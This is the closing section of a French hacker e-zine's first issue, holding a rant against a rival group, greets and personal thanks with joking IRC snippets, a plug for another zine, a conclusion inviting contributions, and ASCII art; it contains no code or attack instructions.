aimez IGA dites le ! Et ne gueuler pas que c'est de la merde simplement parce qu'un type de la scène a dit la même chose !! Ne soyez pas des BOEUFS à la raison étriquée !! Vous avez de droit d'aimer ou de ne pas aimer... ce n'est pas un crime que d'avoir sa propre raison... +++Brain Override+++ ------------------------------------------------------------------------------------------ ------------------------------------------------------------------------------------------ XIII] Greets ! Eh Brain, t'es vraiment le meilleur hacker que je connaisse ! Mouaaaaarf :))).. t'auras pas un @ pour autant ;) Bouhhhh....:(((((( Eh les gars je cherche un hacker qui voudrait m'apprendre à me servire de BO. Demande à W c'est le chef de tous les hackers. Mais pourquoi il est sur autant de channels ? Il est tellement fort qu'il a hacké UNDERNET ! Ok.. Eh W tu peux m'aider à me servir de back orrifice ? *** Z3r0-Coo1 as been kicked from #hack.fr by Brain-Ove (Trop de lame !!) [00:59] pk tu ma kicker? Je remercie la copine mystérieuse de Brain Override. Qui que tu sois, grâce à toi, il ne ramène plus de filles chez moi pendant que je débuggue ses programmes parce que monsieur, a d'autres programmes...fort bruyants d'ailleurs. Grâce à toi je récupère ma chambre, pour mes froides nuits d'hiver, encore merci ! +++Crash Test+++ Qui que tu sois, moi aussi je te remercie ! Grâce à toi Brain n'est plus entouré d'un million de filles, c'était pas très pratique pour se concentrer sur le système ! J'ai jamais encore compris comment Brain faisait pour tenir le coup ! Eh Brain, C'est pas toi qu'a breveté le viagra ? +++Phoenix+++ Eh les gars ! Ca fait pas sérieux ce genre de remarques !! Bon moi je voudrai remercier !LLEGAL, ASheS, Redsativa alias Liquid_X alias Mob alias Snowcrash (c'est quoui le prochain ?), Le virus informatique et Pirate, 2 mag hors normes, DefBond, Thorin, Utopiste ainsi que tous les membres des channels #hack.fr, #rhino9, #cdif, #linuxfr... Je remercie plus particulièrement ma copine mystérieuse (qui m'a larguée d'ailleurs...), je sais qu'elle ne lira probablement jamais ce texte, mais je veux te dire que je t'aime plus que tout au monde et que je serai toujours là pour toi... Je tiens aussi à remercier mon ami Julien qui doit supporter mon inssuportable caractère qui se limite parfois à parler de celle que j'aime en boucle pendant quelques heures ou bien à lui dire : il est 17H00..elle ne m'a toujours pas appelé....snif.. Je remercie aussi Sylvie pour être si gentille avec moi quand j'en ai besoin et pour cette brève mais très agréable soirée en Italie. Tu arrives à me faire sourire alors qu'en ce moment j'ai le blues à fond... c'est cool ! Un remerciement aussi à tous les admins, les sysop, pour leur stupidité. A Bernard Héliord pour ses mails sympatiques, au chocolat, au café, au coca... à ma mère.. pour sa patience devant mon bordel...et pour finir à la connerie et à l'ignorance sans lesquelles nous ne serions pas là pour les combattres... A vaincre sans peril, on triomphe sans gloire... +++Brain Override+++ Je voudrai egalement faire remarquer l'excellent zine FRANCAIS CRYPTEL, un mag quasi parfait, sans prétentions et qui pourtant vaux bien mieux que certains plus en vue... altern.org/cryptel : un vrai régal ! [15:33] T mon idole! =) [15:35] Vive la scène franco et que ces lamerz de iga disparaissent, c'est mon commentaire [15:35] ... et je le partage [15:35] vous savez pas ou je peux avoir de la doc pour savoir comment ca marche les exploits ?? [17:05] L'insulte pour l'excuse ne vaut rien. ------------------------------------------------------------------------------------------- ------------------------------------------------------------------------------------------- C O N C L U S I O N ------------------------------------------------------------------------------------------- ------------------------------------------------------------------------------------------- Bon.. et bien j'espère que cette première ne vous a pas trop déçue. C'est un peu newbie pour commencer puis cela se complexifiera au fil des numéros. Nous sommes ouverts à toutes vos suggestions et tous commentaires (même ignobles !) et si vous avez envie d'écrire un article pour nous... N'hésitez pas. On essaiera de vous pondre un truc un peu plus technique pour la prochaine fois ;) @+ + + + B r 4 1 n 0 v 3 r r ! d 3 + + + XX XX X**X X X**X X****X X X X X****X X******X X*X X*X X******X X********X X**X X**X X********X X**********X X**XX X**XX X**********X X***********XXXXXXXXXXXXXXXXXXX***********X XXX***********X X*****X X***********XXX X**************XX X***X XX**************X X****************X X*X X****************X X**************XXXXX X XXXXX*************X X*****XXXX****X X X X****XXXX*****X X*****X X***X X X X***X X*****X XX****X X*X X XX XX X X*X X****XX X*****X X X X X X X X X X****XX X****X XX X X X XX X****X X**XX X X X X X X X X XX**X X*XX X XX X X X X XX X XX*X X*X X X XX X X XX X X X*X XX X X XXXX X X XXXX X X XX X X X XX X X XX X X X X X X X X X X X X X X X X X X X X X X X X X X X X X X X X X XX X XX X X X